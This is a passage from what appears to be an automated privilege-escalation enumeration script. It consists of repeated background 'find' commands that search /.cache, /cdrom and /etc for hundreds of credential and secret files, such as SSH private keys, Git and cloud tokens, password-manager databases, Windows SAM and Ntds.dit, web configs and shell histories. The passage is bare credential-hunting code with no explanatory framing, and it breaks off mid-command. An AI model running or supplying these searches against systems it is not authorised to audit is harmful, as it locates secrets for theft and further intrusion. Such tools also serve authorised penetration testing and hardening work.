\"setupinfo\" -o -name \"*.csr\" -o -name \"software.sav\" -o -name \".git\" -o -name \"mariadb.cnf\" -o -name \"accessTokens.json\" -o -name \".bashrc\" -o -name \".plan\" -o -name \"settings.php\" -o -name \".github\" -o -name \"authorized_hosts\" -o -name \"cloud.cfg\" -o -name \"*config*.php\" -o -name \"azureProfile.json\" -o -name \"autologin\" -o -name \"*.db\" -o -name \".k5login\" -o -name \"*.sqlite\" -o -name \"SYSTEM\" -o -name \"default.sav\" -o -name \"software\" -o -name \"httpd.conf\" -o -name \".vault-token\" -o -name \"sites.ini\" -o -name \"db.php\" -o -name \".htpasswd\" -o -name \".*_history.*\" -o -name \"wp-config.php\" -o -name \"config.php\" -o -name \"Dockerfile\" -o -name \"authorized_keys\" -o -name \"*.der\" -o -name \"sitemanager.xml\" -o -name \"KeePass.enforced*\" -o -name \"*.p12\" -o -name \"*.kdbx\" -o -name \"pg_hba.conf\" -o -name \"*.keyring\" -o -name \"ipsec.secrets\" -o -name \"*credential*\" -o -name \".wgetrc\" -o -name \"ipsec.conf\" -o -name \"sysprep.inf\" -o -name \"passwd\" -o -name \"drives.xml\" -o -name \".gitconfig\" -o -name \"ftp.config\" -o -name \".secrets.mkey\" -o -name \"legacy_credentials.db\" -o -name \"wcx_ftp.ini\" -o -name \"id_dsa*\" -o -name \".erlang.cookie\" -o -name \"krb5.keytab\" -o -name \"mongod*.conf\" -o -name \"unattended.xml\" -o -name \"influxdb.conf\" -o -name \"docker.sock\" -o -name \"zabbix_agentd.conf\" -o -name \"gitlab.rm\" -o -name \"scclient.exe\" -o -name \"*.cer\" -o -name \"gvm-tools.conf\" -o -name \"kadm5.acl\" -o -name \"*.gpg\" -o -name \"tomcat-users.xml\" -o -name \"AzureRMContext.json\" -o -name \"error.log\" -o -name \"sysprep.xml\" -o -name \".git-credentials\" -o -name \"kcpassword\" -o -name \"*.swp\" -o -name \"KeePass.config*\" -o -name \"winscp.ini\" -o -name \".profile\" -o -name \"my.ini\" -o -name \"printers.xml\" -o -name \"elasticsearch.y*ml\" -o -name \"SecEvent.Evt\" -o -name \"ffftp.ini\" -o -name \"anaconda-ks.cfg\" -o -name \"php.ini\" -o -name \"credentials.db\" -o -name \"*.jks\" -o -name \"index.dat\" -o -name \"recentservers.xml\" -o -name \"*vnc*.txt\" -o -name \"my.cnf\" -o -name \"*.keystore\" -o -name \"*password*\" -o -name \"database.php\" -o -name \"hosts.equiv\" -o -name \"bash.exe\" -o -name \"backups\" -o -name \"docker-compose.yml\" -o -name \".env\" -o -name \"*.socket\" -o -name \"access_tokens.json\" -o -name \"*.gnupg\" -o -name \"protecteduserkey.bin\" -o -name \"system.sav\" -o -name \"security.sav\" -o -name \"kibana.y*ml\" -o -name \"jetty-realm.properties\" -o -name \"known_hosts\" -o -name \"datasources.xml\" -o -name \"rsyncd.conf\" -o -name \"ws_ftp.ini\" -o -name \"https-xampp.conf\" -o -name \"cesi.conf\" -o -name \"access_tokens.db\" -o -name \"autologin.conf\" -o -name \"unattend.inf\" -o -name \"*.rdg\" -o -name \"*.ftpconfig\" -o -name \"hostapd.conf\" -o -name \"groups.xml\" -o -name \"sssd.conf\" -o -name \"*.pem\" -o -name \"*.service\" -o -name \"*vnc*.ini\" -o -name \"web*.config\" -o -name \"*.pgp\" -o -name \".pypirc\" -o -name \"sentry.conf.py\" -o -name \"*.pfx\" -o -name \"*.crt\" -o -name \"snmpd.conf\" -o -name \"Ntds.dit\" -o -name \"access.log\" -o -name \"unattend.xml\" -o -name \".msmtprc\" -o -name \"*vnc*.c*nf*\" -o -name \"storage.php\" -o -name \"passbolt.php\" -o -name \"SAM\" -o -name \"mosquitto.conf\" -o -name \".lesshst\" -o -name \"zabbix_server.conf\" -o -name \"NetSetup.log\" -o -name \".google_authenticator\" -o -name \"pgsql.conf\" -o -name \"https.conf\" -o -name \"fastcgi_params\" -o -name \"secrets.yml\" -o -name \"pgadmin*.db\" -o -name \"wsl.exe\" -o -name \"ftp.ini\" -o -name \"*.timer\" -o -name \"id_rsa*\" -o -name \"KeePass.ini\" -o -name \"gitlab.yml\" -o -name \".rhosts\" -o -name \"*.key\" -o -name \"*.sqlite3\" -o -name \"RDCMan.settings\" -o -name \"ntuser.dat\" -o -name \"server.xml\" -o -name \"redis.conf\" -o -name \"debian.cnf\" -o -name \"iis6.log\" -o -name \"*.viminfo\" -o -name \"000-default.conf\" -o -name \"krb5.conf\" -o -name \"backup\" -o -name \"ConsoleHost_history.txt\" -o -name \"TokenCache.dat\" -o -name \"postgresql.conf\" -o -name \"creds*\" -o -name \"*vnc*.xml\" -o -name \"FreeSSHDservice.ini\" -o -name \"appcmd.exe\" -o -name \"vault-ssh-helper.hcl\" -o -name \"AppEvent.Evt\" -o -name \"scheduledtasks.xml\" -o -name \"credentials\" -o -name \"*.ovpn\" -o -name \".ldaprc\" -o -name \"ddclient.conf\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"`
FIND_CACHE=`eval_bckgrd "find /.cache -name \"ddclient.conf\" -o -name \"database.php\" -o -name \"*vnc*.ini\" -o -name \".google_authenticator\" -o -name \"ntuser.dat\" -o -name \"*credential*\" -o -name \"credentials\" -o -name \"setupinfo\" -o -name \"*.kdbx\" -o -name \"gitlab.yml\" -o -name \"KeePass.config*\" -o -name \"https.conf\" -o -name \"NetSetup.log\" -o -name \".*_history.*\" -o -name \".msmtprc\" -o -name \".lesshst\" -o -name \"passbolt.php\" -o -name \"KeePass.ini\" -o -name \"error.log\" -o -name \"*.swp\" -o -name \"filezilla.xml\" -o -name \"AzureRMContext.json\" -o -name \"datasources.xml\" -o -name \"kibana.y*ml\" -o -name \"groups.xml\" -o -name \"*.p12\" -o -name \"scclient.exe\" -o -name \"pgadmin*.db\" -o -name \"SYSTEM\" -o -name \"docker-compose.yml\" -o -name \"known_hosts\" -o -name \"setupinfo.bak\" -o -name \".env\" -o -name \"*.db\" -o -name \".pypirc\" -o -name \"cloud.cfg\" -o -name \"*.sqlite\" -o -name \"*.csr\" -o -name \"drives.xml\" -o -name \"*.rdg\" -o -name \".ldaprc\" -o -name \"my.cnf\" -o -name \"access.log\" -o -name \"krb5.keytab\" -o -name \"mosquitto.conf\" -o -name \"racoon.conf\" -o -name \"mongod*.conf\" -o -name \"TokenCache.dat\" -o -name \"iis6.log\" -o -name \"php.ini\" -o -name \"rsyncd.secrets\" -o -name \".erlang.cookie\" -o -name \"wcx_ftp.ini\" -o -name \".sudo_as_admin_successful\" -o -name \"snmpd.conf\" -o -name \"supervisord.conf\" -o -name \"fastcgi_params\" -o -name \"db.php\" -o -name \"ftp.ini\" -o -name \"hostapd.conf\" -o -name \"security.sav\" -o -name \"*.timer\" -o -name \"*.der\" -o -name \"scheduledtasks.xml\" -o -name \"ipsec.conf\" -o -name \"bash.exe\" -o -name \"*config*.php\" -o -name \"debian.cnf\" -o -name \"httpd.conf\" -o -name \"hosts.equiv\" -o -name \"*.socket\" -o -name \"*.service\" -o -name \"ws_ftp.ini\" -o -name \"sites.ini\" -o -name \"psk.txt\" -o -name \".profile\" -o -name \"*.ovpn\" -o -name \"*.jks\" -o -name \".recently-used.xbel\" -o -name \"*.cer\" -o -name \"kadm5.acl\" -o -name \"software\" -o -name \"backup\" -o -name \"*vnc*.xml\" -o -name \"krb5.conf\" -o -name \"gvm-tools.conf\" -o -name \".wgetrc\" -o -name \".vault-token\" -o -name \"*.gnupg\" -o -name \"printers.xml\" -o -name \"pg_hba.conf\" -o -name \"wsl.exe\" -o -name \"*vnc*.txt\" -o -name \".git-credentials\" -o -name \"cesi.conf\" -o -name \"ipsec.secrets\" -o -name \"index.dat\" -o -name \"my.ini\" -o -name \"*.pfx\" -o -name \"unattend.xml\" -o -name \".git\" -o -name \"unattended.xml\" -o -name \"authorized_keys\" -o -name \"docker.socket\" -o -name \"rsyncd.conf\" -o -name \"zabbix_server.conf\" -o -name \"*.viminfo\" -o -name \"access_tokens.db\" -o -name \"unattend.txt\" -o -name \"secrets.ldb\" -o -name \"sitemanager.xml\" -o -name \"credentials.db\" -o -name \"sssd.conf\" -o -name \"postgresql.conf\" -o -name \"web*.config\" -o -name \"ConsoleHost_history.txt\" -o -name \"tomcat-users.xml\" -o -name \"server.xml\" -o -name \"mariadb.cnf\" -o -name \"*.pem\" -o -name \"*password*\" -o -name \"*.keyring\" -o -name \".rhosts\" -o -name \".github\" -o -name \"access_tokens.json\" -o -name \"azureProfile.json\" -o -name \".htpasswd\" -o -name \"config.php\" -o -name \"software.sav\" -o -name \"recentservers.xml\" -o -name \"*.ftpconfig\" -o -name \"passwd\" -o -name \"autologin.conf\" -o -name \"zabbix_agentd.conf\" -o -name \"secrets.yml\" -o -name \"system.sav\" -o -name \"unattend.inf\" -o -name \"SecEvent.Evt\" -o -name \"appcmd.exe\" -o -name \"sysprep.xml\" -o -name \"legacy_credentials.db\" -o -name \"elasticsearch.y*ml\" -o -name \"SAM\" -o -name \"https-xampp.conf\" -o -name \"sysprep.inf\" -o -name \"backups\" -o -name \"influxdb.conf\" -o -name \"KeePass.enforced*\" -o -name \"ffftp.ini\" -o -name \"000-default.conf\" -o -name \"authorized_hosts\" -o -name \"vault-ssh-helper.hcl\" -o -name \"settings.php\" -o -name \"*.pgp\" -o -name \".plan\" -o -name \"*.key\" -o -name \".secrets.mkey\" -o -name \"autologin\" -o -name \"id_dsa*\" -o -name \"FreeSSHDservice.ini\" -o -name \"redis.conf\" -o -name \"AppEvent.Evt\" -o -name \"RDCMan.settings\" -o -name \"accessTokens.json\" -o -name \"Ntds.dit\" -o -name \"storage.php\" -o -name \"*.gpg\" -o -name \"docker.sock\" -o -name \".bashrc\" -o -name \"sentry.conf.py\" -o -name \"wp-config.php\" -o -name \".k5login\" -o -name \"Dockerfile\" -o -name \"pagefile.sys\" -o -name \"gitlab.rm\" -o -name \"default.sav\" -o -name \"*.sqlite3\" -o -name \"winscp.ini\" -o -name \"creds*\" -o -name \"kcpassword\" -o -name \"*.crt\" -o -name \"anaconda-ks.cfg\" -o -name \".gitconfig\" -o -name \"pgsql.conf\" -o -name \"*.keystore\" -o -name \"id_rsa*\" -o -name \"ftp.config\" -o -name \"*vnc*.c*nf*\" -o -name \"protecteduserkey.bin\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` FIND_CACHE=`eval_bckgrd "find /.cache -name \"racoon.conf\" -o -name \".sudo_as_admin_successful\" -o -name \"psk.txt\" -o -name \"filezilla.xml\" -o -name \"rsyncd.secrets\" -o -name \"secrets.ldb\" -o -name \"pagefile.sys\" -o -name \"docker.socket\" -o -name \"setupinfo.bak\" -o -name \"supervisord.conf\" -o -name \"unattend.txt\" -o -name \".recently-used.xbel\" -o -name \"setupinfo\" -o -name \"*.csr\" -o -name \"software.sav\" -o -name \".git\" -o -name \"mariadb.cnf\" -o -name \"accessTokens.json\" -o -name \".bashrc\" -o -name \".plan\" -o -name \"settings.php\" -o -name \".github\" -o -name \"authorized_hosts\" -o -name \"cloud.cfg\" -o -name \"*config*.php\" -o -name \"azureProfile.json\" -o -name \"autologin\" -o -name \"*.db\" -o -name \".k5login\" -o -name \"*.sqlite\" -o -name \"SYSTEM\" -o -name \"default.sav\" -o -name \"software\" -o -name \"httpd.conf\" -o -name \".vault-token\" -o -name \"sites.ini\" -o -name \"db.php\" -o -name \".htpasswd\" -o -name \".*_history.*\" -o -name \"wp-config.php\" -o -name \"config.php\" -o -name \"Dockerfile\" -o -name \"authorized_keys\" -o -name \"*.der\" -o -name \"sitemanager.xml\" -o -name \"KeePass.enforced*\" -o -name \"*.p12\" -o -name \"*.kdbx\" -o -name \"pg_hba.conf\" -o -name \"*.keyring\" -o -name \"ipsec.secrets\" -o -name \"*credential*\" -o -name \".wgetrc\" -o -name \"ipsec.conf\" -o -name \"sysprep.inf\" -o -name \"passwd\" -o -name \"drives.xml\" -o -name \".gitconfig\" -o -name \"ftp.config\" -o -name \".secrets.mkey\" -o -name \"legacy_credentials.db\" -o -name \"wcx_ftp.ini\" -o -name \"id_dsa*\" -o -name \".erlang.cookie\" -o -name \"krb5.keytab\" -o -name \"mongod*.conf\" -o -name \"unattended.xml\" -o -name \"influxdb.conf\" -o -name \"docker.sock\" -o -name \"zabbix_agentd.conf\" -o -name \"gitlab.rm\" -o -name \"scclient.exe\" -o -name \"*.cer\" -o -name \"gvm-tools.conf\" -o -name \"kadm5.acl\" -o -name \"*.gpg\" -o -name \"tomcat-users.xml\" -o -name \"AzureRMContext.json\" -o -name \"error.log\" -o -name \"sysprep.xml\" -o -name \".git-credentials\" -o -name \"kcpassword\" -o -name \"*.swp\" -o -name \"KeePass.config*\" -o -name \"winscp.ini\" -o -name \".profile\" -o -name \"my.ini\" -o -name \"printers.xml\" -o -name \"elasticsearch.y*ml\" -o -name \"SecEvent.Evt\" -o -name \"ffftp.ini\" -o -name \"anaconda-ks.cfg\" -o -name \"php.ini\" -o -name \"credentials.db\" -o -name \"*.jks\" -o -name \"index.dat\" -o -name \"recentservers.xml\" -o -name \"*vnc*.txt\" -o -name \"my.cnf\" -o -name \"*.keystore\" -o -name \"*password*\" -o -name \"database.php\" -o -name \"hosts.equiv\" -o -name \"bash.exe\" -o -name \"backups\" -o -name \"docker-compose.yml\" -o -name \".env\" -o -name \"*.socket\" -o -name \"access_tokens.json\" -o -name \"*.gnupg\" -o -name \"protecteduserkey.bin\" -o -name \"system.sav\" -o -name \"security.sav\" -o -name \"kibana.y*ml\" -o -name \"jetty-realm.properties\" -o -name \"known_hosts\" -o -name \"datasources.xml\" -o -name \"rsyncd.conf\" -o -name \"ws_ftp.ini\" -o -name \"https-xampp.conf\" -o -name \"cesi.conf\" -o -name \"access_tokens.db\" -o -name \"autologin.conf\" -o -name \"unattend.inf\" -o -name \"*.rdg\" -o -name \"*.ftpconfig\" -o -name \"hostapd.conf\" -o -name \"groups.xml\" -o -name \"sssd.conf\" -o -name \"*.pem\" -o -name \"*.service\" -o -name \"*vnc*.ini\" -o -name \"web*.config\" -o -name \"*.pgp\" -o -name \".pypirc\" -o -name \"sentry.conf.py\" -o -name \"*.pfx\" -o -name \"*.crt\" -o -name \"snmpd.conf\" -o -name \"Ntds.dit\" -o -name \"access.log\" -o -name \"unattend.xml\" -o -name \".msmtprc\" -o -name \"*vnc*.c*nf*\" -o -name \"storage.php\" -o -name \"passbolt.php\" -o -name \"SAM\" -o -name \"mosquitto.conf\" -o -name \".lesshst\" -o -name \"zabbix_server.conf\" -o -name \"NetSetup.log\" -o -name \".google_authenticator\" -o -name \"pgsql.conf\" -o -name \"https.conf\" -o -name \"fastcgi_params\" -o -name \"secrets.yml\" -o -name \"pgadmin*.db\" -o -name \"wsl.exe\" -o -name \"ftp.ini\" -o -name \"*.timer\" -o -name \"id_rsa*\" -o -name \"KeePass.ini\" -o -name \"gitlab.yml\" -o -name \".rhosts\" -o -name \"*.key\" -o -name \"*.sqlite3\" -o -name \"RDCMan.settings\" -o -name \"ntuser.dat\" -o -name \"server.xml\" -o -name \"redis.conf\" -o -name \"debian.cnf\" -o -name \"iis6.log\" -o -name \"*.viminfo\" -o -name \"000-default.conf\" -o -name \"krb5.conf\" -o -name \"backup\" -o -name \"ConsoleHost_history.txt\" -o -name \"TokenCache.dat\" -o -name \"postgresql.conf\" -o -name \"creds*\" -o -name \"*vnc*.xml\" -o -name \"FreeSSHDservice.ini\" -o -name \"appcmd.exe\" -o -name \"vault-ssh-helper.hcl\" -o -name \"AppEvent.Evt\" -o -name \"scheduledtasks.xml\" -o -name \"credentials\" -o -name \"*.ovpn\" -o -name \".ldaprc\" -o -name \"ddclient.conf\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"`
FIND_CDROM=`eval_bckgrd "find /cdrom -name \"ddclient.conf\" -o -name \"database.php\" -o -name \"*vnc*.ini\" -o -name \".google_authenticator\" -o -name \"ntuser.dat\" -o -name \"*credential*\" -o -name \"credentials\" -o -name \"setupinfo\" -o -name \"*.kdbx\" -o -name \"gitlab.yml\" -o -name \"KeePass.config*\" -o -name \"https.conf\" -o -name \"NetSetup.log\" -o -name \".*_history.*\" -o -name \".msmtprc\" -o -name \".lesshst\" -o -name \"passbolt.php\" -o -name \"KeePass.ini\" -o -name \"error.log\" -o -name \"*.swp\" -o -name \"filezilla.xml\" -o -name \"AzureRMContext.json\" -o -name \"datasources.xml\" -o -name \"kibana.y*ml\" -o -name \"groups.xml\" -o -name \"*.p12\" -o -name \"scclient.exe\" -o -name \"pgadmin*.db\" -o -name \"SYSTEM\" -o -name \"docker-compose.yml\" -o -name \"known_hosts\" -o -name \"setupinfo.bak\" -o -name \".env\" -o -name \"*.db\" -o -name \".pypirc\" -o -name \"cloud.cfg\" -o -name \"*.sqlite\" -o -name \"*.csr\" -o -name \"drives.xml\" -o -name \"*.rdg\" -o -name \".ldaprc\" -o -name \"my.cnf\" -o -name \"access.log\" -o -name \"krb5.keytab\" -o -name \"mosquitto.conf\" -o -name \"racoon.conf\" -o -name \"mongod*.conf\" -o -name \"TokenCache.dat\" -o -name \"iis6.log\" -o -name \"php.ini\" -o -name \"rsyncd.secrets\" -o -name \".erlang.cookie\" -o -name \"wcx_ftp.ini\" -o -name \".sudo_as_admin_successful\" -o -name \"snmpd.conf\" -o -name \"supervisord.conf\" -o -name \"fastcgi_params\" -o -name \"db.php\" -o -name \"ftp.ini\" -o -name \"hostapd.conf\" -o -name \"security.sav\" -o -name \"*.timer\" -o -name \"*.der\" -o -name \"scheduledtasks.xml\" -o -name \"ipsec.conf\" -o -name \"bash.exe\" -o -name \"*config*.php\" -o -name \"debian.cnf\" -o -name \"httpd.conf\" -o -name \"hosts.equiv\" -o -name \"*.socket\" -o -name \"*.service\" -o -name \"ws_ftp.ini\" -o -name \"sites.ini\" -o -name \"psk.txt\" -o -name \".profile\" -o -name \"*.ovpn\" -o -name \"*.jks\" -o -name \".recently-used.xbel\" -o -name \"*.cer\" -o -name \"kadm5.acl\" -o -name \"software\" -o -name \"backup\" -o -name \"*vnc*.xml\" -o -name \"krb5.conf\" -o -name \"gvm-tools.conf\" -o -name \".wgetrc\" -o -name \".vault-token\" -o -name \"*.gnupg\" -o -name \"printers.xml\" -o -name \"pg_hba.conf\" -o -name \"wsl.exe\" -o -name \"*vnc*.txt\" -o -name \".git-credentials\" -o -name \"cesi.conf\" -o -name \"ipsec.secrets\" -o -name \"index.dat\" -o -name \"my.ini\" -o -name \"*.pfx\" -o -name \"unattend.xml\" -o -name \".git\" -o -name \"unattended.xml\" -o -name \"authorized_keys\" -o -name \"docker.socket\" -o -name \"rsyncd.conf\" -o -name \"zabbix_server.conf\" -o -name \"*.viminfo\" -o -name \"access_tokens.db\" -o -name \"unattend.txt\" -o -name \"secrets.ldb\" -o -name \"sitemanager.xml\" -o -name \"credentials.db\" -o -name \"sssd.conf\" -o -name \"postgresql.conf\" -o -name \"web*.config\" -o -name \"ConsoleHost_history.txt\" -o -name \"tomcat-users.xml\" -o -name \"server.xml\" -o -name \"mariadb.cnf\" -o -name \"*.pem\" -o -name \"*password*\" -o -name \"*.keyring\" -o -name \".rhosts\" -o -name \".github\" -o -name \"access_tokens.json\" -o -name \"azureProfile.json\" -o -name \".htpasswd\" -o -name \"config.php\" -o -name \"software.sav\" -o -name \"recentservers.xml\" -o -name \"*.ftpconfig\" -o -name \"passwd\" -o -name \"autologin.conf\" -o -name \"zabbix_agentd.conf\" -o -name \"secrets.yml\" -o -name \"system.sav\" -o -name \"unattend.inf\" -o -name \"SecEvent.Evt\" -o -name \"appcmd.exe\" -o -name \"sysprep.xml\" -o -name \"legacy_credentials.db\" -o -name \"elasticsearch.y*ml\" -o -name \"SAM\" -o -name \"https-xampp.conf\" -o -name \"sysprep.inf\" -o -name \"backups\" -o -name \"influxdb.conf\" -o -name \"KeePass.enforced*\" -o -name \"ffftp.ini\" -o -name \"000-default.conf\" -o -name \"authorized_hosts\" -o -name \"vault-ssh-helper.hcl\" -o -name \"settings.php\" -o -name \"*.pgp\" -o -name \".plan\" -o -name \"*.key\" -o -name \".secrets.mkey\" -o -name \"autologin\" -o -name \"id_dsa*\" -o -name \"FreeSSHDservice.ini\" -o -name \"redis.conf\" -o -name \"AppEvent.Evt\" -o -name \"RDCMan.settings\" -o -name \"accessTokens.json\" -o -name \"Ntds.dit\" -o -name \"storage.php\" -o -name \"*.gpg\" -o -name \"docker.sock\" -o -name \".bashrc\" -o -name \"sentry.conf.py\" -o -name \"wp-config.php\" -o -name \".k5login\" -o -name \"Dockerfile\" -o -name \"pagefile.sys\" -o -name \"gitlab.rm\" -o -name \"default.sav\" -o -name \"*.sqlite3\" -o -name \"winscp.ini\" -o -name \"creds*\" -o -name \"kcpassword\" -o -name \"*.crt\" -o -name \"anaconda-ks.cfg\" -o -name \".gitconfig\" -o -name \"pgsql.conf\" -o -name \"*.keystore\" -o -name \"id_rsa*\" -o -name \"ftp.config\" -o -name \"*vnc*.c*nf*\" -o -name \"protecteduserkey.bin\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` FIND_CDROM=`eval_bckgrd "find /cdrom -name \"racoon.conf\" -o -name \".sudo_as_admin_successful\" -o -name \"psk.txt\" -o -name \"filezilla.xml\" -o -name \"rsyncd.secrets\" -o -name \"secrets.ldb\" -o -name \"pagefile.sys\" -o -name \"docker.socket\" -o -name \"setupinfo.bak\" -o -name \"supervisord.conf\" -o -name \"unattend.txt\" -o -name \".recently-used.xbel\" -o -name \"setupinfo\" -o -name \"*.csr\" -o -name \"software.sav\" -o -name \".git\" -o -name \"mariadb.cnf\" -o -name \"accessTokens.json\" -o -name \".bashrc\" -o -name \".plan\" -o -name \"settings.php\" -o -name \".github\" -o -name \"authorized_hosts\" -o -name \"cloud.cfg\" -o -name \"*config*.php\" -o -name \"azureProfile.json\" -o -name \"autologin\" -o -name \"*.db\" -o -name \".k5login\" -o -name \"*.sqlite\" -o -name \"SYSTEM\" -o -name \"default.sav\" -o -name \"software\" -o -name \"httpd.conf\" -o -name \".vault-token\" -o -name \"sites.ini\" -o -name \"db.php\" -o -name \".htpasswd\" -o -name \".*_history.*\" -o -name \"wp-config.php\" -o -name \"config.php\" -o -name \"Dockerfile\" -o -name \"authorized_keys\" -o -name \"*.der\" -o -name \"sitemanager.xml\" -o -name \"KeePass.enforced*\" -o -name \"*.p12\" -o -name \"*.kdbx\" -o -name \"pg_hba.conf\" -o -name \"*.keyring\" -o -name \"ipsec.secrets\" -o -name \"*credential*\" -o -name \".wgetrc\" -o -name \"ipsec.conf\" -o -name \"sysprep.inf\" -o -name \"passwd\" -o -name \"drives.xml\" -o -name \".gitconfig\" -o -name \"ftp.config\" -o -name \".secrets.mkey\" -o -name \"legacy_credentials.db\" -o -name \"wcx_ftp.ini\" -o -name \"id_dsa*\" -o -name \".erlang.cookie\" -o -name \"krb5.keytab\" -o -name \"mongod*.conf\" -o -name \"unattended.xml\" -o -name \"influxdb.conf\" -o -name \"docker.sock\" -o -name \"zabbix_agentd.conf\" -o -name \"gitlab.rm\" -o -name \"scclient.exe\" -o -name \"*.cer\" -o -name \"gvm-tools.conf\" -o -name \"kadm5.acl\" -o -name \"*.gpg\" -o -name \"tomcat-users.xml\" -o -name \"AzureRMContext.json\" -o -name \"error.log\" -o -name \"sysprep.xml\" -o -name \".git-credentials\" -o -name \"kcpassword\" -o -name \"*.swp\" -o -name \"KeePass.config*\" -o -name \"winscp.ini\" -o -name \".profile\" -o -name \"my.ini\" -o -name \"printers.xml\" -o -name \"elasticsearch.y*ml\" -o -name \"SecEvent.Evt\" -o -name \"ffftp.ini\" -o -name \"anaconda-ks.cfg\" -o -name \"php.ini\" -o -name \"credentials.db\" -o -name \"*.jks\" -o -name \"index.dat\" -o -name \"recentservers.xml\" -o -name \"*vnc*.txt\" -o -name \"my.cnf\" -o -name \"*.keystore\" -o -name \"*password*\" -o -name \"database.php\" -o -name \"hosts.equiv\" -o -name \"bash.exe\" -o -name \"backups\" -o -name \"docker-compose.yml\" -o -name \".env\" -o -name \"*.socket\" -o -name \"access_tokens.json\" -o -name \"*.gnupg\" -o -name \"protecteduserkey.bin\" -o -name \"system.sav\" -o -name \"security.sav\" -o -name \"kibana.y*ml\" -o -name \"jetty-realm.properties\" -o -name \"known_hosts\" -o -name \"datasources.xml\" -o -name \"rsyncd.conf\" -o -name \"ws_ftp.ini\" -o -name \"https-xampp.conf\" -o -name \"cesi.conf\" -o -name \"access_tokens.db\" -o -name \"autologin.conf\" -o -name \"unattend.inf\" -o -name \"*.rdg\" -o -name \"*.ftpconfig\" -o -name \"hostapd.conf\" -o -name \"groups.xml\" -o -name \"sssd.conf\" -o -name \"*.pem\" -o -name \"*.service\" -o -name \"*vnc*.ini\" -o -name \"web*.config\" -o -name \"*.pgp\" -o -name \".pypirc\" -o -name \"sentry.conf.py\" -o -name \"*.pfx\" -o -name \"*.crt\" -o -name \"snmpd.conf\" -o -name \"Ntds.dit\" -o -name \"access.log\" -o -name \"unattend.xml\" -o -name \".msmtprc\" -o -name \"*vnc*.c*nf*\" -o -name \"storage.php\" -o -name \"passbolt.php\" -o -name \"SAM\" -o -name \"mosquitto.conf\" -o -name \".lesshst\" -o -name \"zabbix_server.conf\" -o -name \"NetSetup.log\" -o -name \".google_authenticator\" -o -name \"pgsql.conf\" -o -name \"https.conf\" -o -name \"fastcgi_params\" -o -name \"secrets.yml\" -o -name \"pgadmin*.db\" -o -name \"wsl.exe\" -o -name \"ftp.ini\" -o -name \"*.timer\" -o -name \"id_rsa*\" -o -name \"KeePass.ini\" -o -name \"gitlab.yml\" -o -name \".rhosts\" -o -name \"*.key\" -o -name \"*.sqlite3\" -o -name \"RDCMan.settings\" -o -name \"ntuser.dat\" -o -name \"server.xml\" -o -name \"redis.conf\" -o -name \"debian.cnf\" -o -name \"iis6.log\" -o -name \"*.viminfo\" -o -name \"000-default.conf\" -o -name \"krb5.conf\" -o -name \"backup\" -o -name \"ConsoleHost_history.txt\" -o -name \"TokenCache.dat\" -o -name \"postgresql.conf\" -o -name \"creds*\" -o -name \"*vnc*.xml\" -o -name \"FreeSSHDservice.ini\" -o -name \"appcmd.exe\" -o -name \"vault-ssh-helper.hcl\" -o -name \"AppEvent.Evt\" -o -name \"scheduledtasks.xml\" -o -name \"credentials\" -o -name \"*.ovpn\" -o -name \".ldaprc\" -o -name \"ddclient.conf\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"`
FIND_ETC=`eval_bckgrd "find /etc -name \"ddclient.conf\" -o -name \"database.php\" -o -name \"*vnc*.ini\" -o -name \".google_authenticator\" -o -name \"ntuser.dat\" -o -name \"*credential*\" -o -name \"credentials\" -o -name \"setupinfo\" -o -name \"*.kdbx\" -o -name \"gitlab.yml\" -o -name \"KeePass.config*\" -o -name \"https.conf\" -o -name \"NetSetup.log\" -o -name \".*_history.*\" -o -name \".msmtprc\" -o -name \".lesshst\" -o -name \"passbolt.php\" -o -name \"KeePass.ini\" -o -name \"error.log\" -o -name \"*.swp\" -o -name \"filezilla.xml\" -o -name \"AzureRMContext.json\" -o -name \"datasources.xml\" -o -name \"kibana.y*ml\" -o -name \"groups.xml\" -o -name \"*.p12\" -o -name \"scclient.exe\" -o -name \"pgadmin*.db\" -o -name \"SYSTEM\" -o -name \"docker-compose.yml\" -o -name \"known_hosts\" -o -name \"setupinfo.bak\" -o -name \".env\" -o -name \"*.db\" -o -name \".pypirc\" -o -name \"cloud.cfg\" -o -name \"*.sqlite\" -o -name \"*.csr\" -o -name \"drives.xml\" -o -name \"*.rdg\" -o -name \".ldaprc\" -o -name \"my.cnf\" -o -name \"access.log\" -o -name \"krb5.keytab\" -o -name \"mosquitto.conf\" -o -name \"racoon.conf\" -o -name \"mongod*.conf\" -o -name \"TokenCache.dat\" -o -name \"iis6.log\" -o -name \"php.ini\" -o -name \"rsyncd.secrets\" -o -name \".erlang.cookie\" -o -name \"wcx_ftp.ini\" -o -name \".sudo_as_admin_successful\" -o -name \"snmpd.conf\" -o -name \"supervisord.conf\" -o -name \"fastcgi_params\" -o -name \"db.php\" -o -name \"ftp.ini\" -o -name \"hostapd.conf\" -o -name \"security.sav\" -o -name \"*.timer\" -o -name \"*.der\" -o -name \"scheduledtasks.xml\" -o -name \"ipsec.conf\" -o -name \"bash.exe\" -o -name \"*config*.php\" -o -name \"debian.cnf\" -o -name \"httpd.conf\" -o -name \"hosts.equiv\" -o -name \"*.socket\" -o -name \"*.service\" -o -name \"ws_ftp.ini\" -o -name \"sites.ini\" -o -name \"psk.txt\" -o -name \".profile\" -o -name \"*.ovpn\" -o -name \"*.jks\" -o -name \".recently-used.xbel\" -o -name \"*.cer\" -o -name \"kadm5.acl\" -o -name \"software\" -o -name \"backup\" -o -name \"*vnc*.xml\" -o -name \"krb5.conf\" -o -name \"gvm-tools.conf\" -o -name \".wgetrc\" -o -name \".vault-token\" -o -name \"*.gnupg\" -o -name \"printers.xml\" -o -name \"pg_hba.conf\" -o -name \"wsl.exe\" -o -name \"*vnc*.txt\" -o -name \".git-credentials\" -o -name \"cesi.conf\" -o -name \"ipsec.secrets\" -o -name \"index.dat\" -o -name \"my.ini\" -o -name \"*.pfx\" -o -name \"unattend.xml\" -o -name \".git\" -o -name \"unattended.xml\" -o -name \"authorized_keys\" -o -name \"docker.socket\" -o -name \"rsyncd.conf\" -o -name \"zabbix_server.conf\" -o -name \"*.viminfo\" -o -name \"access_tokens.db\" -o -name \"unattend.txt\" -o -name \"secrets.ldb\" -o -name \"sitemanager.xml\" -o -name \"credentials.db\" -o -name \"sssd.conf\" -o -name \"postgresql.conf\" -o -name \"web*.config\" -o -name \"ConsoleHost_history.txt\" -o -name \"tomcat-users.xml\" -o 